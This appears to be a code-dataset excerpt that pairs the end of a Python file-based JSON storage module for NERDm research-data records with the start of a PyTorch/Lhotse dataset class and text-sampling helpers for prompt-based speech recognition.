self._nxtseq\n try:\n write_json(nxt, self._seqp)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write ID sequence file: %s\"\n % (str(self._seqp), str(ex))) \n\n def _new_id(self):\n out = \"%s_%d\" % (self._pfx, self._nxtseq)\n nxt = self._nxtseq + 1\n self._cache_next_seq(nxt)\n self._nxtseq = nxt\n return out\n\n def _reserve_id(self, id):\n m = _idre.search(id)\n if m:\n # the id was set by a previous call to this class's minter\n # extract the number to ensure future ids are unique\n n = int(m.group(1))\n if n >= self._nxtseq:\n self._nxtseq = n + 1\n self._cache_next_seq()\n\n # self._children: the contents of the implicit, top-level collection\n #\n def _cache_children(self, children=None):\n if children is None:\n children = self._children\n try:\n write_json(children, str(self._chldp))\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write top collection data: %s\"\n % (str(self._chldp), str(ex))) \n\n def _read_toplevel_files(self):\n if not self._chldp.exists():\n # child listing file, yet; create one based on the directory contents\n children = OrderedDict(self._discover_toplevel_files())\n self._cache_children(children)\n\n else:\n try:\n children = read_json(str(self._chldp))\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: failed to load JSON data: %s\"\n % (str(self._chldp), str(ex)))\n if not isinstance(children, OrderedDict) or \\\n any([not isinstance(v, str) for v in children.values()]):\n raise 
StorageFormatException(\"%s: does not contain a name-id map\")\n\n return children\n\n def _discover_toplevel_files(self):\n failed = []\n found = []\n for jf in os.listdir(self._dir):\n if jf.endswith(\".json\") and not jf.startswith(\".\") and not jf.startswith(\"_\"):\n found.append(jf)\n try:\n md = read_json(str(self._dir / jf))\n except (ValueError, IOError) as ex:\n failed.append(jf)\n if '/' not in md.get('filepath', '/'):\n id = md.get('@id')\n if not id:\n id = os.path.splitext(md['filepath'])[0]\n yield (md['filepath'], id)\n\n # find file metadata\n #\n def _fmd_file(self, id, is_coll: bool):\n id = id.replace(os.sep,'::')\n pfx = \"c:\" if is_coll else \"f:\"\n return self._dir / (pfx + id + \".json\")\n\n def _is_coll_mdfile(self, mdfile: Path):\n if not mdfile:\n return False\n return mdfile.name.startswith(\"c:\")\n\n def _find_fmd_file(self, id):\n loc = self._fmd_file(id, False)\n if not loc.exists():\n loc = self._fmd_file(id, True)\n if not loc.exists():\n loc = None\n return loc\n\n def exists(self, id: str) -> bool:\n return bool(self._find_fmd_file(id))\n\n def get_file_by_id(self, id: str) -> Mapping:\n return self._export_file(self._get_file_by_id(id))\n\n def _get_file_by_id(self, id: str) -> Mapping:\n mdf = self._find_fmd_file(id)\n if not mdf:\n raise ObjectNotFound(id)\n return self._read_file_md(mdf)\n\n def _read_file_md(self, mdfile: Path) -> Mapping:\n try:\n return read_json(str(mdfile))\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file metadata as JSON: %s\" \n % (str(mdf), str(ex)))\n\n def _export_file(self, fmd):\n out = OrderedDict([m for m in fmd.items() if not m[0].startswith(\"__\")])\n if self.is_collection(out):\n out['has_member'] = [OrderedDict([('@id', m[1]), ('name', m[0])])\n for m in fmd.get(\"__children\",{}).items()]\n return out\n\n def get_file_by_path(self, path: str) -> Mapping:\n if not path:\n raise ValueError(\"get_file__path(): No path specified\")\n return self._export_file(self._get_file_by_path(path))\n \n def _get_file_by_path(self, path: str) -> Mapping:\n return self._get_file_by_id(self._find_fmd_id_by_path(path))\n\n def _find_fmd_id_by_path(self, path: str) -> str:\n return self._find_fmd_id_by_relpath(self._children, path.split('/'), path)\n\n def _find_fmd_id_by_relpath(self, children: Mapping, steps: [str], origpath):\n top = steps.pop(0)\n if top not in children:\n raise ObjectNotFound(origpath)\n\n if not steps:\n return children[top]\n\n mdf = self._find_fmd_file(children[top])\n if not self._is_coll_mdfile(mdf):\n raise ObjectNotFound(origpath)\n fmd = self._read_file_md(mdf)\n\n return self._find_fmd_id_by_relpath(fmd.get(\"__children\", {}), steps, origpath)\n\n def path_exists(self, filepath) -> bool:\n try:\n return self.exists(self._find_fmd_id_by_path(filepath))\n except ObjectNotFound:\n return False\n\n def path_is_collection(self, filepath) -> bool:\n try:\n id = self._find_fmd_id_by_path(filepath)\n if not id:\n return False\n return self._is_coll_mdfile(self._find_fmd_file(id))\n except ObjectNotFound:\n return False\n\n def get_ids_in_subcoll(self, collpath: str) -> [str]:\n children = self._children\n if collpath != \"\":\n try:\n coll = self._get_file_by_path(collpath)\n except ObjectNotFound:\n return []\n else:\n children = coll.get('__children', [])\n\n return list(children.values())\n\n def get_subcoll_members(self, collpath: str) -> Iterator[Mapping]:\n for id in self.get_ids_in_subcoll(collpath):\n yield self.get_file_by_id(id)\n\n @property\n def 
\n @property\n def ids(self):\n return list(self.iter_ids())\n\n def iter_ids(self):\n return iter(self._IDIterator(self))\n\n class _IDIterator:\n def __init__(self, fstore, children=None):\n self._fs = fstore\n if children is None:\n children = list(fstore._children.values())\n self.descendents = children\n def __iter__(self):\n return self\n def __next__(self):\n if self.descendents:\n desc = self.descendents.pop(0)\n mdf = self._fs._find_fmd_file(desc)\n if mdf and self._fs._is_coll_mdfile(mdf):\n descmd = self._fs._read_file_md(mdf)\n if descmd.get('__children'):\n self.descendents.extend(descmd.get('__children', {}).values())\n return desc\n raise StopIteration()\n\n def iter_files(self):\n for id in self.iter_ids():\n yield self.get_file_by_id(id)\n\n # manipulate files (via their metadata)\n #\n def _cache_file_md(self, fmd):\n fmdf = self._fmd_file(fmd['@id'], self.is_collection(fmd))\n try:\n write_json(fmd, fmdf)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write file metadata: %s\" % (str(fmdf), str(ex)))\n\n def _import_file(self, fmd: Mapping, filepath: str=None, id: str=None, astype=None):\n # Copy and convert the file metadata into the form that is held internally\n out = OrderedDict([copy.deepcopy(m) for m in fmd.items() if m[0] != 'has_member'])\n if filepath:\n out['filepath'] = filepath\n if id:\n out['@id'] = id\n if astype:\n if isinstance(astype, str):\n astype = [astype]\n if isinstance(astype, (tuple, list)):\n out['@type'] = list(astype)\n\n if out.get('@id'):\n self._reserve_id(out['@id'])\n else:\n out['@id'] = self._new_id()\n\n if not out.get('filepath'):\n # Missing a filepath (avoid this); set to default\n out['filepath'] = self._basename(out['@id'])\n\n if not out.get('@type'):\n # Assume that this should be a regular file\n out['@type'] = [DATAFILE_TYPE, DOWNLOADABLEFILE_TYPE]\n \n # if self.is_collection(fmd) and 'has_member' in fmd:\n # # convert 'has_member' to '__children'\n # out['__children'] = OrderedDict()\n # for child in fmd['has_member']:\n # if '@id' in child and 'filepath' in child:\n # out['__children'][self._basename(child['filepath'])] = child['@id']\n return out\n\n def set_file_at(self, md, filepath: str=None, id=None, as_coll: bool=None) -> str:\n \"\"\"\n add or update a file component. If `id` is given (or otherwise included in the metadata as \n the `@id` property) and it already exists in the file list, its metadata will be replaced\n with the data provided; if it does not exist, then the `filepath` will be used to locate and \n update an existing file. If no file matching either the `id` or the `filepath` exists,\n a new file is added with the given file path (or with the path given in the metadata); if the \n file does not have an identifier, a new one will be assigned. If the previously existing file\n with the given identifier has a file path different from the given `filepath`, the file component \n will effectively be moved to the new path and given the new metadata. 
\n \"\"\"\n # first, make sure we have both an id and a filepath for the input metadata\n if not id:\n id = md.get('@id')\n oldfile = None\n if id:\n try:\n oldfile = self._get_file_by_id(id)\n except ObjectNotFound:\n pass\n\n if not filepath:\n filepath = md.get('filepath')\n if not filepath and oldfile:\n filepath = oldfile.get('filepath')\n if not filepath:\n raise ValueError(\"set_file_at(): filepath must be provided\")\n\n destfile = None\n try:\n destfile = self._get_file_by_path(filepath)\n except ObjectNotFound:\n pass\n if not oldfile:\n oldfile = destfile\n\n if oldfile and not id:\n id = oldfile.get('@id')\n\n as_coll = [SUBCOLL_TYPE] if as_coll is True else None\n\n md = self._import_file(md, filepath, id, as_coll) # assigns an @id if needed\n\n # Note: at this point,\n # oldfile = existing file with same id as md\n # destfile = existing file with same filepath as md\n\n # ensure the parent collection exists\n if '/' in filepath and not self.path_is_collection(self._dirname(filepath)):\n raise ObjectNotFound(self._dirname(filepath))\n\n # Are we \"writing over\" an existing file?\n deldestfile = False\n if destfile and \\\n (destfile['@id'] != md['@id'] or self.is_collection(destfile) != self.is_collection(md)):\n if destfile.get('__children'):\n # destination is a non-empty collection: won't clobber it\n raise CollectionRemovalDissallowed(destfile['filepath'], \"collection is not empty\")\n deldestfile = True\n\n if oldfile:\n if self.is_collection(oldfile) and self.is_collection(md):\n # updating a collection; preserve its contents\n md['__children'] = oldfile.get('__children')\n if md['__children'] is None:\n md['__children'] = OrderedDict()\n\n if filepath != oldfile.get('filepath'):\n # this is a file move; deregister it from its old parent\n self._deregister_from_parent(oldfile['filepath'])\n\n # save this record\n self._cache_file_md(md)\n\n if deldestfile:\n # delete the old destination file\n mdf = self._find_fmd_file(destfile['@id'])\n if mdf:\n mdf.unlink()\n\n # register the new file with its parent\n self._register_with_parent(md['filepath'], md['@id'])\n\n return md['@id']\n\n def _register_with_parent(self, filepath, id):\n if '/' in filepath:\n parent = self._get_file_by_path(self._dirname(filepath))\n name = self._basename(filepath)\n if not self.is_collection(parent):\n raise ObjectNotFound(parent, message=self._dirname(filepath)+\": Not a subcollection\")\n if '__children' not in parent:\n parent['__children'] = OrderedDict()\n parent['__children'][name] = id\n self._cache_file_md(parent)\n\n else:\n self._children[filepath] = id\n self._cache_children()\n\n def _deregister_from_parent(self, filepath):\n if '/' in filepath:\n try:\n parent = self._get_file_by_path(self._dirname(filepath))\n name = self._basename(filepath)\n if name in parent.get('__children',{}):\n del parent['__children'][name]\n self._cache_file_md(parent)\n except ObjectNotFound:\n pass\n else:\n if filepath in self._children:\n del self._children[filepath]\n self._cache_children()\n\n def load_file_components(self, cmps):\n # Note that this implementation makes no assumptions about what order the components\n # appear in.\n \n # Once through to load all files by their ID\n for cmp in cmps:\n if cmp.get('filepath'):\n if cmp.get('@id'):\n self._reserve_id(cmp.get('@id'))\n self.set_file_at(cmp, cmp['filepath'], cmp['@id'])\n\n # Go through again to (1) assign ids to file components that are missing one,\n # and (2) create a map from parent subcollections to their children\n children = 
{'': []}\n saved = set()\n subcolls = []\n for cmp in cmps:\n if cmp.get('filepath'):\n id = cmp.get('@id')\n if not id:\n # assign an ID to file component missing one\n id = self.set_file_at(cmp, cmp['filepath'])\n\n # build parent-children map\n if '/' in cmp['filepath']:\n parent = self._dirname(cmp['filepath'])\n if parent not in children:\n children[parent] = []\n children[parent].append( (self._basename(cmp['filepath']), id) )\n else:\n children[''].append( (cmp['filepath'], id) )\n self._children[cmp['filepath']] = id\n\n saved.add(id)\n\n # remember subcollections\n if self.is_collection(cmp):\n cmp['@id'] = id\n subcolls.append(cmp)\n\n # Go through a last time to set the subcollection content info into each subcollection component\n for cmp in subcolls:\n if cmp.get('filepath') in children:\n if '__children' not in cmp:\n cmp['__children'] = OrderedDict()\n\n # base subcollection contents first on 'has_member' list as this captures order info\n if cmp.get('has_member'):\n if isinstance(cmp.get('has_member',[]), str):\n cmp['has_member'] = [cmp['has_member']]\n for child in cmp['has_member']:\n if child.get('@id') in saved and child.get('name'):\n cmp['__children'][child['name']] = child.get('@id')\n\n # capture any that got missed by 'has_member'\n for child in children[cmp['filepath']]:\n if child[0] not in cmp['__children']:\n cmp['__children'][child[0]] = child[1]\n\n self.set_file_at(cmp)\n\n def delete_file(self, id: str) -> bool:\n if self._res.deleted:\n raise RecordDeleted(self._res.id, \"delete_file\")\n\n try:\n fmd = self._get_file_by_id(id)\n except ObjectNotFound:\n return False\n\n # deregister it with its parent\n self._deregister_from_parent(fmd['filepath'])\n\n # now delete the file entry\n self._find_fmd_file(id).unlink()\n return True\n\n def empty(self):\n if self._res.deleted:\n raise RecordDeleted(self._res.id, \"empty\")\n self._children = OrderedDict()\n if self._chldp.is_file():\n self._chldp.unlink()\n\n for jf in os.listdir(self._dir):\n if jf.endswith(\".json\") and not jf.startswith(\".\") and not jf.startswith(\"_\"):\n file = self._dir / jf\n if file.is_file():\n file.unlink()\n\n self._cache_children()\n\n def set_order_in_subcoll(self, collpath: str, ids: Iterable[str]) -> Iterable[str]:\n if self._res.deleted:\n raise RecordDeleted(self._res.id, \"set_order_in_subcoll\")\n children = self._children\n coll = None\n if collpath:\n coll = self._get_file_by_path(collpath)\n if not self.is_collection(coll):\n raise ObjectNotFound(collpath, message=collpath+\": not a subcollection component\")\n if '__children' not in coll:\n coll['__children'] = OrderedDict()\n children = coll['__children']\n\n # create an inverted child map\n byid = OrderedDict( [(itm[1], itm[0]) for itm in children.items()] )\n ids = list(ids)\n for id in byid:\n if id not in ids:\n ids.append(id)\n\n # reorder the original map\n children.clear()\n for id in ids:\n if id in byid:\n children[byid[id]] = id\n\n if coll:\n self._cache_file_md(coll)\n else:\n self._cache_children()\n\n\nclass FSBasedResource(NERDResource):\n \"\"\"\n a file-based implementation of the NERDResource interface in which all data are stored in JSON \n files on disk.\n \"\"\"\n\n _subprops = \"authors references components\".split()\n
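\n # --- editor's sketch (illustrative, based on the constructor below) -----\n # assumed on-disk layout for one resource, with a hypothetical id:\n # <storeroot>/<id with the ark prefix stripped and os.sep -> \"::\">/\n # res.json # resource-level metadata\n # auths/ refs/ files/ nonfiles/ # per-facet component storage\n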
\n def __init__(self, id: str, storeroot: str, create: bool=True, parentlog: Logger=None):\n super(FSBasedResource, self).__init__(id, parentlog)\n storeroot = Path(storeroot)\n if not storeroot.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(storeroot))\n if not os.access(storeroot, os.R_OK|os.W_OK|os.X_OK):\n raise StorageFormatException(\"%s: directory not writeable\" % str(storeroot))\n\n self._dir = storeroot / _arkre.sub('', self.id).replace(os.sep, '::')\n self._resmdfile = self._dir / \"res.json\"\n\n self._auths = None\n self._refs = None\n self._files = None\n self._nonfiles = None\n\n if create and not self._dir.exists():\n self._create_empty()\n\n def _create_empty(self):\n if not self._dir.exists():\n self._dir.mkdir()\n self._cache_res_md({ \"@id\": self.id })\n\n @property\n def authors(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._auths:\n dir = self._dir / \"auths\"\n if not dir.exists():\n dir.mkdir()\n self._auths = FSBasedAuthorList(self, dir)\n return self._auths\n\n @property\n def references(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._refs:\n dir = self._dir / \"refs\"\n if not dir.exists():\n dir.mkdir()\n self._refs = FSBasedRefList(self, dir)\n return self._refs\n\n @property\n def nonfiles(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._nonfiles:\n dir = self._dir / \"nonfiles\"\n if not dir.exists():\n dir.mkdir()\n self._nonfiles = FSBasedNonFileComps(self, dir)\n return self._nonfiles\n\n @property\n def files(self):\n if self.deleted:\n raise RecordDeleted(self.id, \"get metadata\")\n if not self._files:\n dir = self._dir / \"files\"\n if not dir.exists():\n dir.mkdir()\n self._files = FSBasedFileComps(self, dir)\n return self._files\n\n @property\n def deleted(self):\n return not self._dir.exists()\n\n def delete(self):\n if not self.deleted:\n self._data = None\n self._files = None\n self._nonfiles = None\n self._refs = None\n self._auths = None\n shutil.rmtree(self._dir)\n\n def _cache_res_md(self, md):\n if self.deleted:\n self._create_empty()\n try:\n write_json(md, self._resmdfile)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write resource metadata: %s\"\n % (str(self._resmdfile), str(ex)))\n\n def replace_res_data(self, md):\n md = OrderedDict(p for p in md.items() if p[0] not in self._subprops)\n self._cache_res_md(md)\n\n def get_res_data(self) -> Mapping:\n if self.deleted:\n return None\n try:\n return read_json(self._resmdfile)\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read resource metadata as JSON: %s\" \n % (str(self._resmdfile), str(ex)))\n\n def get_data(self, inclfiles=True) -> Mapping:\n out = self.get_res_data()\n if out is None:\n return None\n\n if self.authors.count > 0:\n out['authors'] = self.authors.get_data()\n if self.references.count > 0:\n out['references'] = self.references.get_data()\n if self.nonfiles.count > 0 or self.files.count > 0:\n out['components'] = []\n if self.nonfiles.count > 0:\n out['components'].extend(self.nonfiles.get_data())\n if self.files.count > 0:\n out['components'].extend(self.files.get_files())\n return out\n \n
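\n# --- editor's note (illustration) -------------------------------------------\n# get_data() above reassembles a full NERDm record by splicing the cached\n# resource-level JSON with the authors, references, and component lists -- the\n# same properties that replace_res_data() strips out before caching.\n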
\nclass FSBasedResourceStorage(NERDResourceStorage):\n \"\"\"\n a factory for opening records stored as JSON files on disk\n \"\"\"\n _seqfile = \"_seq.json\"\n _idre = re.compile(r'^\\w+\\d*:0*(\\d+)$')\n\n @classmethod\n def from_config(cls, config: Mapping, logger: Logger):\n \"\"\"\n a class method for creating an FSBasedResourceStorage instance from configuration data.\n\n Recognized configuration parameters include:\n\n ``store_dir``\n (str) _required_. The root directory under which all resource data will be stored.\n ``default_shoulder``\n (str) _optional_. The shoulder that new identifiers are minted under. This is not \n normally used as direct clients of this class typically choose the shoulder on a \n per-call basis. The default is \"nrd\".\n\n :param dict config: the configuration for the specific type of storage\n :param Logger logger: the logger to use to capture messages\n \"\"\"\n if not config.get('store_dir'):\n raise ConfigurationException(\"Missing required configuration parameter: store_dir\")\n \n return cls(config['store_dir'], config.get(\"default_shoulder\", \"nrd\"), logger)\n \n def __init__(self, storeroot: str, newidprefix: str=\"nrd\", logger: Logger=None):\n \"\"\"\n initialize a factory with the resource data storage rooted at a given directory\n :param str newidprefix: a prefix to use when minting new identifiers\n \"\"\"\n self._dir = Path(storeroot)\n pdir = self._dir.parents[0]\n if not pdir.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(pdir))\n if not self._dir.exists():\n self._dir.mkdir()\n if not self._dir.is_dir():\n raise StorageFormatException(\"%s: does not exist as a directory\" % str(self._dir))\n if not os.access(self._dir, os.R_OK|os.W_OK|os.X_OK):\n raise StorageFormatException(\"%s: directory not writeable\" % str(self._dir))\n\n self._pfx = newidprefix\n self._seqp = self._dir / self._seqfile # the path where the next sequence is cached\n self._nxtseq = self._read_next_seq() # the next available sequence # for assigned IDs\n\n if not logger:\n logger = logging.getLogger(\"nerdstore\")\n self._log = logger\n\n def _new_id(self):\n out = \"{0}:{1:04d}\".format(self._pfx, self._nxtseq)\n nxt = self._nxtseq + 1\n self._cache_next_seq(nxt)\n self._nxtseq = nxt\n return out\n\n def _reserve_id(self, id):\n m = self._idre.search(_arkre.sub('', id))\n if m:\n n = int(m.group(1))\n if n >= self._nxtseq:\n self._nxtseq = n + 1\n self._cache_next_seq()\n\n def _read_next_seq(self):\n nxt = 1\n if self._seqp.is_file():\n try:\n nxt = read_json(self._seqp)\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file as JSON: %s\" \n % (str(self._seqp), str(ex)))\n if not isinstance(nxt, int):\n raise StorageFormatException(\"%s: ID sequence file does not contain an integer\" % str(self._seqp))\n\n return nxt\n\n def _cache_next_seq(self, nxt: int = None):\n if nxt is None:\n nxt = self._nxtseq\n try:\n write_json(nxt, self._seqp)\n except IOError as ex:\n raise StorageFormatException(\"%s: Failed to write ID sequence file: %s\"\n % (str(self._seqp), str(ex))) \n\n def delete(self, id: str) -> bool:\n fn = self._dir / id.replace(os.sep, '::')\n if fn.is_dir():\n shutil.rmtree(fn)\n return True\n return False\n \n def open(self, id: str=None) -> NERDResource:\n if not id:\n id = self._new_id()\n return FSBasedResource(id, self._dir, True, self._log)\n
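\n # --- editor's hedged usage sketch (hypothetical paths; `log` is assumed) --\n # store = FSBasedResourceStorage.from_config({\"store_dir\": \"/tmp/nerds\"}, log)\n # res = store.open() # mints an id like \"nrd:0001\"\n # res.replace_res_data({\"title\": \"demo\"})\n # assert store.exists(res.id)\n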
\n\n def load_from(self, rec: Mapping, id: str=None):\n \"\"\"\n load a NERDm record into this storage. If the record already exists, its contents are replaced.\n :param Mapping rec: the NERDm Resource record to load, given as a JSON-ready dictionary\n :param str id: the ID to assign to the record; if not given, the value of the record's\n `@id` property will be used or one will be created for it.\n \"\"\"\n if not id:\n id = rec.get('@id')\n if id:\n self._reserve_id(id)\n else:\n id = self._new_id()\n\n res = self.open(id)\n res.replace_all_data(rec)\n\n def exists(self, id: str) -> bool:\n dir = self._dir / _arkre.sub('', id).replace(os.sep, \"::\")\n return dir.is_dir()\n\n\n\n","repo_name":"usnistgov/oar-pdr-py","sub_path":"python/nistoar/midas/dap/nerdstore/fsbased.py","file_name":"fsbased.py","file_ext":"py","file_size_in_byte":38503,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"73951372906","text":"import random\nfrom typing import Callable, Dict, List, Optional, Union\n\nimport numpy as np\nimport torch\nfrom lhotse import validate\nfrom lhotse.cut import CutSet\nfrom lhotse.dataset import K2SpeechRecognitionDataset\nfrom lhotse.dataset.input_strategies import BatchIO, PrecomputedFeatures\nfrom lhotse.utils import compute_num_frames, ifnone\nfrom text_normalization import (\n lower_all_char,\n lower_only_alpha,\n remove_non_alphabetic,\n train_text_normalization,\n upper_all_char,\n upper_only_alpha,\n)\nfrom torch.utils.data.dataloader import DataLoader, default_collate\n\n\nclass PromptASRDataset(torch.utils.data.Dataset):\n \"\"\"This is a dataset for Prompt ASR. It supports the following features:\n 1. Select a tuple of (text, pre_text, style_text) randomly from a\n list of texts as supervisions.\n\n \"\"\"\n\n def __init__(\n self,\n return_cuts: bool = False,\n cut_transforms: List[Callable[[CutSet], CutSet]] = None,\n input_transforms: List[Callable[[torch.Tensor], torch.Tensor]] = None,\n input_strategy: BatchIO = PrecomputedFeatures(),\n text_sampling_func: Optional[Callable[[List[str]], str]] = None,\n rare_word_list: Optional[List[str]] = None,\n ):\n \"\"\"\n Icefall ASR IterableDataset constructor. 
See https://github.com/lhotse-speech/lhotse/blob/master/lhotse/dataset/speech_recognition.py\n for more details.\n\n :param return_cuts: When ``True``, will additionally return a \"cut\" field in each batch with the Cut\n objects used to create that batch.\n :param cut_transforms: A list of transforms to be applied on each sampled batch,\n before converting cuts to an input representation (audio/features).\n Examples: cut concatenation, noise cuts mixing, etc.\n :param input_transforms: A list of transforms to be applied on each sampled batch,\n after the cuts are converted to audio/features.\n Examples: normalization, SpecAugment, etc.\n :param input_strategy: Converts cuts into a collated batch of audio/features.\n By default, reads pre-computed features from disk.\n :param text_sampling_func: Sampling a text as transcription from a list of texts.\n \"\"\"\n super().__init__()\n # Initialize the fields\n self.return_cuts = return_cuts\n self.cut_transforms = ifnone(cut_transforms, [])\n self.input_transforms = ifnone(input_transforms, [])\n self.input_strategy = input_strategy\n\n # a text sampling function\n self.text_sampling_func = text_sampling_func\n self.rare_word_list = rare_word_list\n\n def __getitem__(self, cuts: CutSet) -> Dict[str, Union[torch.Tensor, List[str]]]:\n \"\"\"\n Return a new batch, with the batch size automatically determined using the constraints\n of max_frames and max_cuts.\n \"\"\"\n validate_for_asr(cuts)\n\n # Sort the cuts by duration so that the first one determines the batch time dimensions.\n cuts = cuts.sort_by_duration(ascending=False)\n\n # Optional CutSet transforms - e.g. padding, or speed perturbation that adjusts\n # the supervision boundaries.\n for tnfm in self.cut_transforms:\n cuts = tnfm(cuts)\n\n # Sort the cuts again after transforms\n cuts = cuts.sort_by_duration(ascending=False)\n\n # Get a tensor with batched feature matrices, shape (B, T, F)\n # Collation performs auto-padding, if necessary.\n input_tpl = self.input_strategy(cuts)\n if len(input_tpl) == 3:\n # An input strategy with fault tolerant audio reading mode.\n # \"cuts\" may be a subset of the original \"cuts\" variable,\n # containing only the cuts for which we successfully read the audio.\n inputs, _, cuts = input_tpl\n else:\n inputs, _ = input_tpl\n\n # Get a dict of tensors that encode the positional information about supervisions\n # in the batch of feature matrices. The tensors are named \"sequence_idx\",\n # \"start_frame/sample\" and \"num_frames/samples\".\n supervision_intervals = self.input_strategy.supervision_intervals(cuts)\n
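\n # --- editor's note (illustration) ------------------------------------\n # supervision_intervals maps names such as \"sequence_idx\", \"start_frame\"\n # and \"num_frames\" to 1-D tensors with one entry per supervision, so\n # stacking them column-wise below yields one row per supervision.\n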
\n # Apply all available transforms on the inputs, i.e. either audio or features.\n # This could be feature extraction, global MVN, SpecAugment, etc.\n segments = torch.stack(list(supervision_intervals.values()), dim=1)\n for tnfm in self.input_transforms:\n inputs = tnfm(inputs, supervision_segments=segments)\n\n batch = {\n \"inputs\": inputs,\n \"supervisions\": default_collate(\n [\n self.text_sampling_func(\n texts=supervision.texts,\n pre_texts=supervision.pre_texts,\n context_list=supervision.context_list\n if \"context_list\" in supervision.custom\n else None,\n rare_word_list=self.rare_word_list,\n )\n if self.text_sampling_func is not None\n else {\n \"text\": train_text_normalization(supervision.texts[0]),\n \"pre_text\": train_text_normalization(supervision.pre_texts[0]),\n \"style_text\": train_text_normalization(\n supervision.pre_texts[0]\n ),\n \"transform_ids\": 0,\n }\n for sequence_idx, cut in enumerate(cuts)\n for supervision in cut.supervisions\n ]\n ),\n }\n # Update the 'supervisions' field with sequence_idx and start/num frames/samples\n batch[\"supervisions\"].update(supervision_intervals)\n if self.return_cuts:\n batch[\"supervisions\"][\"cut\"] = [\n cut for cut in cuts for sup in cut.supervisions\n ]\n\n has_word_alignments = all(\n s.alignment is not None and \"word\" in s.alignment\n for c in cuts\n for s in c.supervisions\n )\n\n return batch\n\n\ndef validate_for_asr(cuts: CutSet) -> None:\n validate(cuts)\n tol = 2e-3 # 2ms\n for cut in cuts:\n for supervision in cut.supervisions:\n assert supervision.start >= -tol, (\n f\"Supervisions starting before the cut are not supported for ASR\"\n f\" (sup id: {supervision.id}, cut id: {cut.id})\"\n )\n\n # Supervision start time is relative to Cut ...\n # https://lhotse.readthedocs.io/en/v0.10_e/cuts.html\n #\n # 'supervision.end' is end of supervision inside the Cut\n assert supervision.end <= cut.duration + tol, (\n f\"Supervisions ending after the cut \"\n f\"are not supported for ASR\"\n f\" (sup id: {supervision.id}, cut id: {cut.id})\"\n )\n\n\ndef get_substring(s: str, min_len: int = 40, max_len: int = 250) -> str:\n \"\"\"A helper function that generates a random substring from a given string\n\n Args:\n s (str): Input string\n\n Returns:\n str: Returned substring\n \"\"\"\n min_len = min(len(s), min_len)\n\n start = random.randint(0, len(s) - min_len)\n end = min(start + max_len, random.randint(start + min_len, len(s)))\n\n return s[start:end]\n
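\n\ndef _editor_demo_get_substring() -> None:\n # Editor's hedged sketch (not part of the original file): min_len is\n # clamped to len(s) above, so inputs shorter than min_len are safe and\n # simply yield a substring of themselves.\n s = \"a short string\"\n sub = get_substring(s, min_len=40)\n assert sub in s\n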
\n\ndef triplet_text_sampling(\n texts: List[str],\n pre_texts: List[str],\n context_list: Optional[str] = None,\n rare_word_list: Optional[List[str]] = None,\n transforms: Optional[List[Callable[[str], str]]] = None,\n min_len_style: Optional[int] = 80,\n) -> Dict[str, str]:\n \"\"\"This function generates a triplet of\n (pre_text, style_text, ref_text). The style of style_text and ref_text\n should **always** match, whereas the style of pre_text is arbitrary.\n Suppose we have 2 different transforms A,B, and the preceding text is\n referred to as pre_text. The following tuples are all valid:\n\n (A(pre_text), A(style_text), A(ref_text))\n (A(pre_text), B(style_text), B(ref_text))\n (B(pre_text), A(style_text), A(ref_text))\n (B(pre_text), B(style_text), B(ref_text))\n\n If transforms is not given, the following pre-defined transforms\n are available:\n 0: original (mixed-cased, with punc)\n 1: upper_only_alpha (upper-cased, no punc)\n\n When the transform of text and pre_text match, we can use the whole\n pre_text as the prompt text.\n\n Args:\n texts (List[str]):\n A list of ref_texts whose first item is the ground truth\n text from books.\n pre_texts (List[str]):\n A list of pre_texts, whose first item is the groundtruth\n pre_text from books.\n context_list: Optional[str] = None,\n A list of biasing words separated by space\n rare_word_list: Optional[str] = None,\n A list of rare-words separated by space (used as distractors)\n transforms (List[Callable[[str], str]]): A list of possible transforms to be applied\n\n Returns:\n A dictionary of ref_text, pre_text, style_text\n \"\"\"\n assert len(texts) == len(pre_texts)\n assert len(texts) == 2\n\n # we assume the first item to be ground truth\n gt_text = texts[0]\n gt_pre_text = pre_texts[0]\n\n if transforms is None:\n transforms = [\n lambda x: x, # identity: return the input itself\n upper_only_alpha,\n lower_only_alpha,\n lower_all_char,\n ]\n\n sampling_weight = [\n 0.7,\n 0.3,\n 0.0,\n 0.0,\n ] # Mixed-punc should have the largest sampling prob\n\n total_transforms = len(transforms) # do not use the recognized trans\n\n # Randomly sample transforms\n i_text, i_pre_text = np.random.choice(total_transforms, 2, p=sampling_weight)\n\n # get the normalized text and pre_text\n text = transforms[i_text](gt_text)\n pre_text = transforms[i_pre_text](gt_pre_text)\n\n if i_text == i_pre_text:\n style_text = get_substring(pre_text, min_len=min_len_style, max_len=150)\n else:\n # get the pre_text of same style as text\n # For now, **don't** do transform to the style text, because we do it after the dataloader\n style_text = gt_pre_text\n # style_text = pre_texts[i_text] if i_text <= 1 else transforms[i_text-2](gt_pre_text)\n style_text = get_substring(style_text, min_len=min_len_style, max_len=150)\n\n return {\n \"text\": train_text_normalization(text),\n \"pre_text\": train_text_normalization(pre_text),\n \"style_text\": train_text_normalization(style_text),\n \"transform_ids\": i_text,\n }\n\n\ndef triplet_text_sampling_with_context_list(\n texts: List[str],\n pre_texts: List[str],\n context_list: str,\n rare_word_list: List[str],\n transforms: Optional[List[Callable[[str], str]]] = None,\n min_len_style: Optional[int] = 80,\n) -> Dict[str, str]:\n \"\"\"This function generates a triplet of\n (pre_text, style_text, ref_text). The pre_text is either the preceding text\n or a list of words (context words + distractors).\n The style of style_text and ref_text should **always** match, whereas\n the style of pre_text is arbitrary.\n Suppose we have 2 different transforms A,B, and the preceding text is\n referred to as pre_text. 
